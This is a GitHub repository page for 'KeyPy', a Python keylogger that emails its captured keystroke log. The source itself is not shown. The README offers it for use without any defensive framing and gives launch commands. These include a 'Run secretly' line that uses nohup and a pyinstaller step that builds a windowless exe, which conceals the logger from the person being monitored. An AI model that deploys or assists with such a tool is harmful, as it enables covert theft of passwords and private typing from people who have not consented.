Skip to content

Keylogger written in python with sending log file to mail

Notifications You must be signed in to change notification settings

HellenWeb/keypy

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 

Repository files navigation

KeyPy | Keylogger on Python

Keylogger written in python with sending log file to mail

Launching App

First, you need to change the variables in the config.py file, and then

Run secretly

COUNT=number_of_characters EMAIL=email nohup python3 keypy.py

Compile to exe file

pyinstaller --onefile --noconsole keypy.py

Simple start

COUNT=number_of_characters EMAIL=email python3 keypy.py

Description

This is a simple keylogger in python with sending logs to your e-mail

Copyright

© Copyright by. Hellen

About

Keylogger written in python with sending log file to mail

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages